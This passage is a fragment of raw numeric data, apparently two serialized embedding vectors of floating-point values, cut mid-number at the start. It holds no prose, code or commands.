008126779,0.008652448,-0.002897749,-0.016112054,-0.02951538,0.016078154,0.01116608,-0.011869366,0.036749065,-0.0017366167,-0.015390609,-0.012569311,-0.00021067908,0.03321432,0.003855925,-0.0030643535,0.00474968,-0.008013531,0.025508886,0.0031555814,0.0065056505,-0.0022573334,-0.0013399759,0.0071140677,-0.013482456,0.024561398,0.0044385125,0.0070010363,-0.019122694,0.0015226966,-0.0038250883,-0.004702777,0.0056785382,0.0062531163,0.018356467,-0.014145244,-0.02414961,0.026675506,0.029647905,0.017079955,-0.0097001735,0.0040375222,0.018674415,-0.12169422,0.007482134,0.00057047623,-0.00858443,0.0029170772,-0.004938014,0.011768197,0.06204661,-0.005108787,-0.027334798,0.018173782,0.015103394,0.012011861,0.011843006,-0.0037386164,0.023898566,-0.011290326,-0.018939879,-0.014652694,-0.015765345,0.0033789598,0.014124444,0.0043878267,-0.01017061,-0.020258436,0.015609886,0.0042883167,-0.00077534793,-0.010002405,0.006677747,-0.0131765865,0.026332581,-0.0068619926,0.010483394,-0.023245918,0.023847193,-0.0137532605,-0.010973905,0.003465314,0.022955194,-0.009452847,-0.01346895,-0.0058058985,0.003763717,0.019337483,0.0033715663,0.0054961485,-0.017191445,0.0017826388,0.0021205836,-0.009204224,-0.002332831,0.025563248,0.016590027,0.00012014957,0.018755862,-0.0013324158,0.01889378,0.025724934,-0.009966494,0.00692936,0.022982348,0.004376589,-0.0057016835,0.0007341608,0.0064302245,0.012019799,-0.020103661,0.015807565,-0.021429623,-0.006774747,0.004503019,-0.009610013,-0.006279635,-0.0098856725,-0.010349711,-0.0007770098,0.007566806,0.013897199,0.01411557,-0.0405533,0.0041879066,-0.006538796,0.024004247,-0.0072769127,-0.020788988,0.00008932313,0.02037897,-0.00015277215,-0.0046008187,0.014459854,-0.008469364,-0.023812072,-0.0058727767,-0.009227696,0.019693257,-0.006304508,0.020264838,0.0067657405,-0.0069389157,0.013810424,-0.0043473397,-0.0267722,0.00898808,-0.13098583,-0.01811443,0.024494229,-0.0059191696,-0.028227827,-0.0037805964,-0.00919163,0.012219208,0.02350284,-0.012442747,-0.015810007,0.009832785,0.01736574,-0.0060441126,-0.017185546,-0.01809047,-0.026895754,-0.01150659,-0.012056522,0.0044328393,0.023146862,-0.0009231754,-0.0052462267,-0.01535681,-0.0061593894,-0.0036060198,-0.010147058,0.015027191,0.02238499,-0.016659154,-0.006221186,0.015378136,-0.01905567,0.0018291308,-0.018042307,-0.01606882,0.011657533,0.00064776954,-0.0007226944,-0.007945835,-0.0014329838,0.0012187045,0.0045146793,0.014824112,0.013269294,0.0034596054,0.015595074,0.0015175588,0.020104896,0.015088747,-0.011762769,-0.0036025438,0.005383411,-0.014424759,-0.0041309004,-0.02883417,0.007999659,-0.0019234817,-0.008500272,0.02464133,-0.033378765,0.030816697,-0.002740007,-0.018222598,-0.010726892,0.005356113,-0.0020680293,0.0073946933,0.030497963,0.0032301468,-0.021065852,0.032383792,0.02852716,0.0014402546,0.034324545,0.03248735,0.0035597044,0.0097086895,0.009029824,-0.02087181,0.004289414,0.0077734077,-0.024624746,0.039043996,-0.012923892,0.019472597,0.010960488,-0.01166898,-0.014886601,0.027113697,-0.0068563046,-0.0012845033,-0.020131994,-0.0069617764,0.016001636,0.0012626974,-0.0057398677,0.007902581,-0.0012965774,0.005524741,-0.012933994,-0.012180577,0.0038407024,-0.0042576846,-0.017411832,0.0013408666,-0.013220661,0.008749268,-0.027295548,0.011957983,0.008572576,-0.002871885,-0.01311856,0.017242698,0.002961011,0.023551693,0.016622845,0.02143071,0.0013929356,0.016418636,-0.0026589744,0.02966001,0.006813853,-0.0030465743,-0.025480915,0.022819327,-0.024760807,0.005027772,-0.0056573167,0.010373445,0.015744122,0.010324452,-0.004654097,-0.033406917,0.007790144,-0.0041632326,0.016482122,-0.02895616,-0.002435471,-0.006581216,0.011101857,-0.0015812062,0.021950427,0.0209782,0.009725347,0.0023507578,0.0060405415,-0.010119235,0.01276682,0.015574782,-0.0139961075,-0.006898543,0.005734268,0.012852245,-0.0072913147,0.008319011,-0.011805492,0.017989304,0.00097394496,-0.017434893,0.009963767,0.002406711,-0.0085202195,0.00040967672,0.0098870825,0.008692963,-0.00024990583,-0.0013522835,-0.017705152,0.0032193093,0.0021460315,0.013520813,0.018816648,-0.017010152,0.002832924,0.02788278,0.006122527,0.020155556,0.008010385,0.008501832,0.013975492,0.012588496,0.0017770423,0.006792902,0.027807325,-0.002985323,-0.0034354827,-0.0021837987,0.007880455,-0.007961701,0.006066267,0.015630532,0.017715864,-0.0037571338,0.0073670084,-0.004144708,-0.008918209,-0.018884316,0.048555378,-0.0012855065,-0.0045912634,0.012863942,0.018836478,0.006824896,-0.000021831165,-0.0016259819,0.00401538,0.020796347,-0.009479252,-0.0020875558,-0.005538805,-0.028156212,-0.00755201,-0.0017699392,0.0012125114,0.012927354,0.0034072849,-0.0142171495,0.014451048,-0.0066675493,0.004773194,0.004782896,0.024671156,-0.031675566,-0.021453263,0.004836121,0.020979365,0.00907534,0.026365817,0.0052882754,-0.012209246,-0.023562657,0.0042227963,0.015951836,-0.008589158,0.0017675356,-0.0060339705,0.008424351,0.0035634409,-0.0074152555,0.007070243,0.0019398063,0.021113541,-0.002462659,0.020184545,0.024743441,-0.008105326,-0.01202695,0.0056009125,-0.003165315,0.0005120744,-0.016079567,-0.012954904,-0.015089666,-0.034884147,-0.01933659,0.013536342,-0.026418902,0.000009794061,0.0006417584,-0.012223011,-0.0056476695,-0.0075762384,0.016891722,-0.0123953195,-0.00037002165,0.006670778,-0.017409459,0.0034718495,0.013408977,0.009676771,0.008562408,0.0031521432,0.03129755,0.012798098,-0.011776734,-0.0095373485,-0.008717841,-0.031208348,0.0078141065,-0.0077252197,-0.038988445,-0.00146536,-0.0022015942,0.020673176,0.004687859,-0.0071831928,0.03026226,0.017702386,-0.0021626344,0.017828418,-0.00073031674,-0.01019223,0.021806315,-0.0024659033,0.04532438,0.04099608,0.01104953,-0.0059834057,-0.0014191087,0.0142750805,-0.0035291999,-0.0018966626,-0.004575979,-0.0027158258,-0.014737819,-0.004397339,0.018817194,-0.005784219,0.00930213,0.007923188,-0.0039627207,-0.008551924,0.022060381,0.011181065,-0.014904027,-0.004929762,-0.013510827,0.025793009,-0.014670716,-0.01668942,-0.022095503,0.002985067,-0.0049188645,0.008394283,-0.01020611,0.019998917,0.0012735279,0.012195643,-0.023164863,0.028311007,-0.03179726,-0.01552953,0.010450002,0.016995078,-0.0048102257,-0.00374773,0.020627787,-0.0030157133,0.0038940639,-0.005263996,0.021840466,-0.007774242,-0.010057903,-0.020165233,-0.014615416,0.008087006,-0.015787492,0.003564423,-0.004895431,-0.02601755,0.0042586043,-0.0026666827,0.014874183,0.024074592,-0.010248609,-0.022345979,-0.00033802845,-0.0068268864,0.003221914,-0.0063104616,0.01109182,-0.0061580082,-0.0056232107,-0.030286942,0.006638351,-0.02646917,0.018570052,-0.002497672,-0.014801501,0.001280698,-0.011532796,-0.0033895131,-0.002744036,0.008739593,-0.06908427,0.00508416,-0.007779338,-0.011690705,-0.012860064,-0.0008239333,-0.022169571,0.013007567,-0.006103965,0.0036133518,-0.0076378593,-0.015100988,-0.0027877088,-0.004310697,0.006830652,-0.0074249743,-0.016957488,-0.007930576,0.009856427,-0.0044009686,0.013734741,0.03495744,0.014524348,-0.0006245501,0.014440013,-0.009420228,0.007942299,0.010911296,-0.007848736,-0.0046476494,0.022553233,0.008358004,-0.002240133,-0.0029795277,-0.015370426,0.009841092,-0.00673511,0.01016705,0.021978522,-0.03367533,-0.0039793053,0.0016071987,0.033953395,-0.02243152,0.004612917,0.023362575,0.004321898,-0.018211534,-0.030911766,-0.0047053443,0.046530887,-0.0047161332,0.006159922,0.009985928,-0.010850123,-0.008115454,0.018687513,-0.0050215693,0.032072637,0.004330622,-0.0052474216,0.022713574,-0.00012297728,-0.002494684,-0.006600978,0.0064550447,0.01129759,0.014578049,-0.02059413,0.021589447,0.0049761636,-0.009169577,-0.008749746,-0.024012515,0.0054102237,0.0010871544,-0.017818583,-0.008227949,-0.011935314,0.014389814,-0.035557408,0.0178528,0.0065327613,0.034204688,0.0049574687,-0.0077536334,-0.00011170283,-0.0027851337,-0.0066341166,0.021079857,0.016396439,0.017629204,-0.018208094,-0.00085613615,-0.00834745,0.018076386,-0.0014041698,-0.0005349134,0.006580774,0.006938407,-0.0018817849,-0.005356224,0.0063486234,0.0048077186,-0.017637417,-0.015372082,-0.019004494,-0.010676579,-0.010505206,0.0075736395,0.018591681,0.012557027,0.017187247,0.01303522,0.0023773655,-0.005841578,0.03004841,0.0157154,-0.00492074,-0.005234973,-0.023315389,-0.040801343,-0.014925633,-0.008472994,0.008249401,0.00073294184,-0.00350412,-0.024605554,0.002624165,0.0011457722,-0.011281019,0.02291442,0.007928362,0.023910537,0.004937254,-0.007009637,0.014553236,0.023509469,-0.0029685656,0.0035063976,0.007348758,-0.012946955,-0.010705693,-0.016700123,0.007962949,0.028927041,0.009496883,0.017724222,-0.0014491346,0.0033065022,-0.010548854,-0.015118367,-0.0079266215,-0.008257394,0.011936036,0.008785099,0.021568138,-0.015416163,0.021886807,0.019963052,0.0065436014,0.017402243,0.00044408932,-0.0037415859,0.008349502,0.022682121,0.0210627,-0.010231825,0.007402757,-0.029927881,-0.029106723,0.016154248,-0.011482756,0.0003630512,-0.008710466,-0.0063984822,0.028006675,0.0074760104,-0.0040993406,-0.004642165,-0.020647908,0.00092492456,-0.0054889824,0.0027073103,-0.02674707,0.0027514622,-0.00077232916,-0.0060507166,-0.01004186,-0.014783336,0.015893111,0.010525657,-0.004689307,0.015893191,-0.029080415,-0.00035743523,0.016252108,-0.0044758776,0.012626831,0.022272222,-0.0027217206,0.0090472475,-0.003489108,-0.011153454,0.015302487,0.00880147,0.004630987,0.0006602012,-0.014312083,0.0034150584,0.006493088,0.0041842163,0.013948229,0.0697808,0.004572258,-0.01973255,-0.00731052,0.006083291,-0.0044167866,0.013572712,-0.0017126759,0.012669731,-0.022402374,0.001465836,0.010297452,-0.007874892,-0.0005783691,-0.001845017,0.016204776,-0.014143599,0.011484947,-0.024567366,0.014508436,0.023966571,-0.007987398,0.008340724,-0.041684844,0.016021699,-0.02313926,0.010915154,-0.006303046,-0.014903218,-0.00669685,0.009826539,0.014973053,0.0043588737,-0.00095898897,-0.009371395,-0.019384226,0.036376517,-0.0010448596,-0.0036930603,-0.021832794,0.004182176,0.004834646,0.024129307,-0.009201573,-0.022169748,-0.0051428117,-0.010854868,0.005550648,0.020740941,-0.00006702631,0.025508927,0.027760986,-0.0048254896,0.010451301,-0.002003916,-0.011296581,-0.008463358,-0.0090037575,-0.007230971,-0.003597093,0.012079057,-0.020947382,-0.000103245926,0.0030096315,0.021852871,0.016717434,-0.0115250815,-0.0011022409,-0.03338936,-0.03230289,0.012614495,-0.012444414,0.011420681,0.008845156,-0.013271689,0.019058133,-0.014673932,0.00022723478,0.0055305967,-0.0038396695,-0.010558322,0.018135367,-0.020756625,-0.01379957,0.020012548,0.026244441,0.012235738,-0.006010211,-0.0033351628,0.013181714,0.0040096696,0.010277849,-0.0052314014,-0.006576762,-0.0014199938,-0.024581447,0.017303986,-0.014955174,-0.004383158,0.016022043,-0.0051106364,0.0005887697,-0.015651967,0.0014619008,-0.00932196,-0.0159477,0.032219,0.03213861,-0.005502422,0.004839506,0.011814309,0.023725824,0.005528148,0.012980064,-0.008692757,0.0053472547,-0.0014034766,-0.004240415,0.009328742,-0.006815948,0.0010293422,0.022032037,0.02485051,0.036249723,0.009036112,0.012352889,0.010966171,0.014735019,0.01473202,0.009131473,-0.0006994664,-0.019753274,-0.007997197,-0.011734397,-0.0054344507,-0.012771038,0.026805608,0.0014453799,0.01889451,0.00072379434,0.0032164676,-0.007460152,-0.0064655,-0.017437827,0.005302789,-0.033798162,0.035782617,-0.000509819,0.017572256,0.025504766,0.013675845,0.002338961,0.007004059,0.015088104,-0.0019027182,0.0028681601,-0.0035183365,-0.005471439,-0.030197276,-0.00448979,0.007496662,0.010895856,-0.0061532166,-0.017747352,0.010020046,0.00041259994,0.019373609,0.00904885,-0.0018775355,0.020322604,-0.00018084317,0.009155458,-0.025752345,0.024360217,-0.024195772,-0.005888463,0.03485386,-0.0049170298,-0.009608897,-0.0026836523,0.01634725,0.0013267436,-0.0013640187,0.032774188,0.010982852,-0.004723155,-0.0018661818,-0.0004640027,0.011347445,0.024504075,-0.0005636477,0.010945252,0.00087524485,0.005472349,0.0053859525,0.0027240624,-0.0012590995,0.028684912,0.0022008447,-0.013870435,-0.0059244214,-0.0029325278,-0.009668262,-0.015163009,0.011180996,0.00097254966,-0.0013232487,-0.018983053,-0.00886441,0.025347322,0.018788844,0.02564696,0.0018344816,-0.011433167,0.0147034805,0.0048894323,-0.015900765,-0.017435357,-0.012238074,-0.0075581386,-0.0054172846,-0.019380756,-0.018733094,0.013733818,0.012441899,-0.02570707,0.0008691855,0.019455133,0.009042407,-0.023453768,-0.0017264977,-0.018656168,-0.007159441,-0.0057258774,0.014198331,0.004022342,0.01125303,0.019402483,-0.013418231,0.0049497685,-0.02325443,-0.0040216628,-0.010581249,0.0065346984,-0.010748718,-0.004047438,0.0017002384,-0.002808859,-0.00741518,-0.007829336,-0.0037298407,0.013221634,-0.015977988,0.0015869242,0.020845225,-0.01764148,-0.021407863,0.016571052,-0.008323269,-0.013716508,0.029819611,0.0019198235,0.018550703,-0.014819663,-0.0123769045,-0.0018239918,0.006633026,-0.01444957,-0.0070634163,-0.018272534,0.00018049323,-0.007986711,-0.012530669,-0.0076792864,-0.0056576272,-0.002024644,-0.02114437,-0.010804331,-0.024166232,0.01324047,-0.01106448,0.0075310795,0.014867901,0.005928489,0.006251776,0.006089147,0.0028307333,-0.0077606984,0.05641618,-0.05129799,0.00565855,0.015771963,-0.021696437,-0.037567697,0.0017803792,-0.009332033,-0.06341395,0.011446237,0.020350033,-0.015933821,-0.012673593,-0.011019022,0.030768925,-0.007146208,-0.024157679,0.016116204,-0.033060193,0.013490054,-0.0052382234,0.03351455,-0.008773796,0.0011026342,-0.0011209036,-0.0031224156,-0.018120253,-0.032019477,-0.0003634595,0.008624921,0.0028575475,0.0010570751,-0.004340957,-0.022177875,0.011242977,0.022542242,-0.00025229156,-0.0039530937,0.00034833263,-0.0059534423,0.0053298394,-0.023330573,0.013702095,-0.010767029,-0.005828931,-0.0064144563,-0.014020525,0.0055948375,-0.031160906,0.12859817,0.0010690351,-0.005077594,0.00022749075,0.0013261257,-0.020767204,0.013862937,0.020837525,-0.01487558,0.029284252,-0.004009437,0.012668215,-0.008567553,0.010588493,0.023465315,-0.008642468,0.032693785,0.1594959,-0.00005459056,-0.011425243,0.008307483,-0.02543483,0.04563827,-0.001763339,0.0012680189,-0.074321,0.016981345,-0.029536843,0.0049641174,-0.012689574,-0.00027204418,0.0076992624,-0.007904671,-0.023610853,0.0045761215,0.016799532,-0.0010002806,-0.0086608,-0.026380982,0.0011947447,0.0027824258,0.01550127,-0.014598509,0.0059594125,0.0073660477,-0.012966176,-0.002865991,-0.01506485,0.017701235,-0.0006368396,-0.026266174,0.0031219374,0.015837867,-0.006885227,0.016578741,0.033988964,0.0027930397,0.010695387,-0.009227186,0.026389116,-0.018469557,-0.0068658255,-0.012134722,0.024164395,0.017226985,0.0021328072,0.0042756125,-0.032631673,-0.013466821,0.015525484,-0.011944741,0.0024202939,-0.023131527,-0.003920448,-0.0022123405,0.0031774717,-0.022480628,-0.00005870438,0.043680564,-0.010947979,0.00555145,0.029442282,-0.008956506,-0.008654906,-0.0009636746,0.013956977,0.0019276381,0.017799683,0.0077308253,-0.01372694,-0.009508458,0.0072353682,-0.015601444,-0.01998304,-0.003923297,0.013139475,-0.0044277785,8.3098934e-7,-0.0015406597,-0.017703477,0.0041358722,0.024113195,0.019923534,0.012963282,-0.002222724,-0.0015465985,-0.01130035,-0.0034430872,-0.014014871,0.0065429006,0.0019270957,0.015951976,0.014936471,0.010896081,-0.005598961,-0.011025317,0.0041154632,0.041448686,-0.004957025,0.0023549998,-0.0037650552,-0.0036923105,0.014089627,0.012665372,-0.024813691,0.015776787,0.01395159,0.0075837728,-0.023829209,-0.007456429,-0.00058196334,0.0077238632,0.022797462,0.034965638,-0.004717828,0.0026581099,0.0020423937,-0.037549287,-0.014291378,-0.019271992,0.009361411,0.02578376,-0.019757949,0.033155095,-0.018839695,0.0136851715,0.01843324,0.003400798],[-0.003000232,-0.019913362,0.019121954,0.0010824078,-0.0030231879,-0.015155598,0.0025318495,0.021196498,0.016093211,-0.014317075,0.0018858578,0.024409713,0.00071813667,0.009926938,0.009885526,0.0155025115,0.0056122565,-0.0056667537,0.010534318,-0.013345553,-0.00007141943,-0.014037041,-0.00095620623,0.004962551,0.013536185,0.020413876,0.014148156,0.0014203279,0.0011231009,-0.0017972137,0.0117403595,0.020549022,0.0058880807,-0.014369982,0.008212345,0.0013736732,-0.003966868,-0.0040943865,0.0073210998,-0.020918252,0.017064176,0.001625153,-0.015672293,-0.0027601027,-0.011520174,-0.009323459,0.0017030634,-0.0035866674,0.0020795967,0.012611694,-0.0010544583,0.009382376,0.015199762,0.027419569,-0.0066078515,0.024919968,-0.0021867957,-0.029457146,0.011366524,-0.030281564,-0.009341632,0.0078049405,0.001169422,-0.004193061,0.032230694,-0.007621083,-0.013007843,-0.0062115244,-0.0013501765,-0.02149298,0.03793042,0.0029339485,0.012904838,0.008366773,-0.0052965824,0.020529963,-0.0063741137,-0.013634073,-0.017315432,0.0055377726,-0.03378795,-0.013023691,0.0078023355,-0.005039061,-0.002116539,0.004500492,0.0015851235,-0.012420706,0.0056506316,-0.003429364,-0.017521847,0.022724979,-0.013312937,0.004800879,0.0076160245,0.013896249,0.010557346,0.010347369,-0.012668154,-0.008606475,-0.011838298,-0.005570004,-0.020138532,0.014896638,0.009268959,-0.009108634,-0.008127028,0.016987022,-0.005863509,0.013026491,0.009982705,0.004580786,0.008175689,0.0026849108,0.020375578,-0.018567182,-0.0022426276,0.018089931,-0.017073877,0.00726564,0.0010384559,-0.009866235,0.02235801,-0.00073909655,-0.01732403,0.014791048,-0.008599774,0.0077904714,-0.0060710288,-0.022460112,-0.009873489,0.0069253673,-0.0075434423,0.013469788,-0.0004071816,0.0019665605,0.021763291,0.0019525138,0.010376214,-0.018241348,0.008547586,0.016179575,0.004736414,0.013379608,0.009657033,0.0039135646,0.009958363,0.025695255,0.024027688,0.007985075,0.0065966705,0.011392277,0.000115226496,0.0056481855,0.009144385,-0.01159081,-0.0012691033,0.00031168954,-0.0005929649,0.022861501,-0.0000889579,-0.012334421,-0.0026010585,0.022286305,-0.011928765,0.0050146664,-0.00073672435,0.027250873,-0.013139224,-0.003915357,0.006589204,0.0004803225,0.003296464,-0.017926686,-0.012519628,-0.010791328,0.0039288173,-0.011915769,0.00013841636,0.026979443,-0.017514568,0.0155070545,-0.022372581,-0.0060555255,0.018331798,0.01944331,0.0064160624,0.012689141,0.0061061094,-0.020866206,0.0029246265,-0.010643414,-0.0077370973,-0.0034127978,-0.022129614,-0.022048846,0.0028988551,0.10885437,-0.024191469,-0.017205397,0.0033196383,-0.0051760273,-0.011337065,-0.008551725,-0.014289942,0.015489503,-0.003613502,0.019103749,-0.00421671,-0.027372273,0.009496811,0.00900544,0.022113401,0.00067925773,0.032851562,-0.09284637,0.0017396902,0.011187124,-0.02949288,0.017872464,0.021267854,0.0064703296,0.014908755,-0.0149751725,-0.032586083,-0.0012229925,0.030831197,-0.012850104,0.00567038,-0.023426043,0.028805524,0.008267469,-0.017933644,-0.016402157,-0.010136505,-0.032796904,-0.014105878,-0.0020981971,-0.0013659592,-0.005750293,-0.03353672,0.0030855709,0.0040487642,0.011295439,-0.001954738,0.008680396,0.00022580774,-0.0019558806,0.007899887,-0.020031082,-0.0206796,-0.012969459,0.004649483,0.029509792,-0.0028320309,-0.0070048557,0.0034299244,0.0015431363,0.00893012,0.011353454,0.010702661,0.018268561,-0.022045977,0.011293992,0.017025871,-0.004239647,0.015189066,-0.025084253,-0.014599815,-0.0058778804,-0.033104103,-0.00059059175,0.0045376946,-0.020352641,0.017211175,0.02611321,0.012559082,0.01774467,0.0049820496,0.007040293,-0.008252906,-0.0012729533,-0.031994868,-0.021742484,-0.020336919,0.0013210486,0.019104037,0.003744631,0.018881764,-0.013380292,-0.022292191,0.0038711075,0.027816629,0.0050145974,-0.0016644828,-0.011983373,-0.013481956,0.027377373,0.0241891,-0.0056110835,0.021011576,-0.013881783,0.019884378,-0.010144289,-0.030038686,-0.017448988,-0.0025143826,0.015211872,0.01989643,0.0044000815,-0.013528228,0.00048237783,-0.0028515984,0.013078865,-0.0077778706,0.013815635,0.0018908306,-0.017935567,0.014863311,0.0034441072,-0.0035709352,0.0047142333,-0.008690298,0.0001756269,-0.009443071,-0.019580659,0.023559313,0.0066834074,0.011099486,0.04400083,-0.000848557,0.0037743675,0.0061157937,0.016272029,-0.031127581,0.007087775,0.002674847,0.0144923385,0.00822906,0.045669395,-0.003504127,0.018899556,-0.009358183,0.014799246,0.0031520906,0.0010260422,-0.008340903,0.0049500116,0.0147027215,-0.00657788,-0.0050015864,0.007489809,-0.037690375,0.00773318,-0.004420028,-0.021774523,-0.0033504157,0.015914988,-0.018996451,-0.0038226272,0.02754249,-0.018406698,-0.0011051215,0.005012516,0.061976213,0.015043911,-0.0053920206,0.016152743,-0.004960227,-0.003013614,0.03181136,0.020135364,0.013047407,-0.030575324,-0.017898513,-0.003265134,0.0040970724,0.027142901,0.004232966,0.012382117,-0.01240763,0.0012723636,-0.020553784,-0.0142251365,0.014755338,-0.013031595,-0.02062973,0.016734406,0.0023147997,0.004670386,0.007081757,-0.016401904,0.005120954,0.0008407495,-0.018303448,-0.013946171,-0.011514189,-0.010239786,-0.014270995,0.015637923,-0.0002642563,0.0027636387,-0.0009985198,0.010472063,-0.0020586525,-0.021364722,-0.0015074016,0.0028335564,-0.012069477,0.015410691,0.00027739056,-0.00066154834,-0.0139433015,0.013441398,0.0003188686,-0.0008248303,-0.032707784,0.02183685,-0.012921815,0.025022045,0.01919878,-0.005385525,0.0026918263,0.021038773,0.025696894,0.010834277,-0.01885268,0.018940242,-0.0006996339,0.021673365,0.0009484084,0.012737951,-0.016888473,-0.010790821,0.0062251426,0.032666165,0.0015880122,0.008799757,-0.009724333,-0.000510873,-0.014145117,-0.026441207,-0.005861628,0.030133871,0.004753587,0.014675089,-0.0015754973,-0.000036655027,-0.028783916,-0.0068273423,0.0021150317,0.020541474,0.0009705093,-0.037682228,0.0138336355,0.010581322,0.03328224,-0.015115927,0.019616304,-0.0010084813,0.011189023,-0.013406223,-0.015817538,0.01250686,-0.012619659,0.011231828,-0.027429968,-0.009721428,0.0141940685,-0.013236263,-0.00012982702,-0.027125373,0.0075470507,0.017835082,-0.010808866,-0.008131754,-0.015705109,0.012831709,-0.010420943,-0.005799851,-0.010556575,-0.00023278441,0.010061097,0.020469889,0.02074538,0.0016619704,0.00046348965,0.022138271,-0.008613287,0.013141746,-0.007858561,-0.014558644,-0.006046074,0.02207991,0.0038209017,0.01650375,0.0020767432,-0.042651385,-0.017302506,0.008083703,-0.0027701769,-0.016356628,0.036153536,0.006960781,0.0032151164,-0.0011485459,0.015515122,0.009075345,-0.00698342,0.020719273,0.025797945,-0.009329613,-0.0006374457,-0.008513836,0.0033649115,0.00004082586,0.01214804,-0.018103361,-0.017060256,-0.0048807254,0.034662317,-0.006884771,-0.024891408,0.003502275,0.022479007,-0.016096655,0.0054701935,-0.003378589,0.00037531712,0.019252334,0.007831492,0.07048896,0.0022694564,-0.03687416,-0.015481178,0.0087511875,-0.0061142915,-0.00024650735,-0.00414452,-0.013737015,0.0015426631,-0.0071978746,0.0031090595,0.004370047,0.009990758,-0.022374751,0.0024887691,0.013533044,-0.023580946,-0.00346848,0.005042148,0.0028093269,-0.010670353,-0.015276366,-0.029200291,-0.030027188,-0.00937818,0.02060639,0.021237109,0.0037347397,-0.009588408,-0.030493692,0.010908811,0.00874923,-0.0033580475,0.0013358939,0.0091933515,0.010767272,0.009206118,-0.0030177773,0.026690334,0.009720912,-0.006091824,0.030010317,0.016347434,0.020185804,-0.0021454967,-0.017648302,0.00046816198,-0.00026986017,-0.002930374,-0.022046842,-0.0019273566,0.0056236736,-0.0014339008,0.0047723,-0.023378842,0.009001561,0.013705955,-0.012422168,0.012694711,0.02201963,0.0107279215,-0.001499942,-0.050603278,0.010699153,-0.014595448,-0.0004628975,-0.017622204,-0.005279149,-0.031642366,-0.0015272016,-0.005636662,0.021701178,-0.0054122866,0.012448223,0.017806299,-0.0010999144,0.0062215733,0.018574908,-0.004128132,0.005044888,0.019577004,-0.0014439323,-0.01547135,-0.00095558586,-0.005735199,0.0008418399,0.01967682,0.019597381,-0.031207055,0.008469241,0.007231803,0.0076506557,0.032084875,0.01368001,0.0009280471,-0.0058060563,-0.0005957724,0.0097902445,0.009349752,-0.003966674,-0.030578235,0.0019790463,0.051505774,0.00064443727,0.014335421,0.013466008,-0.00019950003,-0.00052023673,-0.010014436,0.0014796224,-0.08720158,0.005302454,0.017257793,0.013934836,-0.009242953,0.02815074,-0.027009394,0.009484085,0.0037345819,-0.012473786,-0.0076029184,0.006967019,-0.0030134362,0.015223831,0.01608865,0.0063365833,-0.019496778,-0.02345952,-0.008884267,-0.058389556,0.010474165,0.021687502,0.003021797,0.014797354,0.0047843126,0.008258558,-0.0073259976,0.009182793,0.0029717078,-0.0032233126,0.019576335,0.0132480245,0.01007988,-0.014840918,-0.010027373,-0.011420211,-0.0051280954,0.007993863,-0.01169104,-0.009267112,0.013161763,-0.015992062,-0.017881125,-0.0048784576,-0.0057091517,0.01995708,-0.013754626,0.017197397,-0.02420328,0.013228097,-0.00022352261,0.0052113193,0.009265259,-0.004950439,0.013062425,0.009158383,0.013227637,0.0046410863,-0.0127382595,0.0027117794,-0.005152222,0.019587664,0.023051001,0.0039703455,0.0069068526,0.02046898,0.015807167,-0.0034693193,0.00000627414,0.0068339063,0.0029109535,0.00056729437,0.027565401,-0.0045548896,0.006839416,0.008188169,0.010907455,0.0070295706,0.0030088755,-0.007205622,0.040780596,-0.026096953,-0.0030955244,0.023968464,-0.011150791,-0.008836458,0.021360317,-0.009936479,-0.0071701803,-0.0055993856,-0.021447275,-0.0009060241,-0.0024648118,-0.00000458966,0.011121099,0.012397987,-0.0040880414,-0.024014015,-0.023323484,0.012652457,0.017062215,0.008970432,-0.019030275,-0.027237184,-0.004046656,-0.014959465,-0.023676667,-0.035485685,-0.029504111,0.029936766,-0.017559249,0.022499997,-0.0011365568,0.021544728,0.010120147,0.035454273,-0.0028169444,-0.00035688898,-0.01194666,0.00028810478,0.025399243,0.03294729,0.0050295936,-0.013367423,0.00058483204,0.018704545,-0.013998616,-0.009588113,0.019471904,0.0131696,0.016619338,0.0021220755,-0.016840637,0.00634541,-0.019265514,-0.028481843,0.011297083,-0.016193584,-0.007923054,-0.0037983705,-0.012500976,-0.005570469,0.017990967,-0.030838182,0.017285936,0.024831409,-0.006167316,0.0048186374,-0.0067576678,0.009738485,0.012447475,0.019420486,-0.02974339,-0.012651754,-0.04616149,0.021349156,-0.0073658153,0.014170477,-0.0013629323,-0.027061718,-0.011035251,-0.0047528124,0.005790894,-0.016694117,0.0025606556,0.009527925,-0.02379002,0.018453822,-0.0043031364,0.0028427893,-0.000061685314,-0.0037287727,0.0021467493,-0.001829621,0.01046653,-0.015603668,-0.010923062,0.009082923,-0.017633533,-0.0027473888,0.009042317,-0.019565897,-0.020119479,0.0067130346,0.0069511193,0.003612392,0.021857228,-0.0004378421,0.027776834,-0.009414317,-0.03217902,0.017343882,0.0018521721,-0.03226433,-0.0070196833,0.0004475091,-0.00870432,0.03232574,0.0004184789,0.0021669588,0.026176943,0.001174873,-0.02654691,0.019125853,0.004986749,-0.009180938,-0.02016647,0.0026600517,-0.02506569,-0.011689915,0.0069521754,-0.016860848,-0.0006148699,0.004623777,0.02574169,-0.0017809769,-0.0074449177,-0.013017397,-0.020407084,-0.0009438619,0.0005354244,0.0025502355,-0.009133332,0.0030211688,-0.005557355,-0.012411083,-0.008572281,0.034762822,-0.007790103,0.0151119325,-0.0045826593,0.008458199,-0.013437925,-0.012635051,0.005032622,-0.008691761,-0.013840237,-0.022816908,-0.0064836363,-0.002516975,0.014731852,0.013837186,0.0018970125,0.0128489835,0.0023916184,-0.016419496,-0.00050600385,-0.005406034,-0.019240106,-0.008871833,0.018117666,-0.035741504,0.0059776534,-0.015513932,0.014953055,0.02614983,-0.022782102,-0.004183262,0.005609599,0.00071539014,0.032687675,0.009390123,0.0014931485,-0.007539003,0.03180478,-0.0035152803,-0.00509719,0.0053314418,-0.004599639,0.030958483,-0.014517715,0.012492892,-0.0013525517,0.016934892,-0.023505336,0.00326584,-0.00959759,-0.0048925537,0.017683929,-0.020154832,0.0042797853,0.016018419,0.008657859,-0.022753669,0.001505809,-0.017296646,0.014404615,0.013807155,-0.0041868337,0.0022607436,-0.0068895486,0.02452816,0.01873669,-0.011014533,0.0010719941,0.004476395,-0.04494185,0.027972372,0.016799066,0.0076984577,-0.011586176,-0.0031213616,-0.012136184,0.008882953,0.027500827,-0.014499211,-0.009607832,-0.0153243365,-0.001985876,-0.0102638025,0.010288057,-0.023184448,-0.016923016,0.008977659,0.0014856262,0.003931802,-0.014118571,0.012794192,0.00817222,0.010553971,0.016726933,-0.019440323,0.022960369,0.0020819637,-0.0109447725,0.017147528,0.021720996,0.01673239,0.007434406,-0.006436945,0.008074218,-0.0166739,0.011508589,0.0034594897,-0.0111552635,-0.011709086,-0.01171776,0.010447053,-0.007815747,0.03844866,-0.014560696,-0.02017506,-0.004950576,-0.0059816376,-0.000057534053,-0.022732804,0.04226283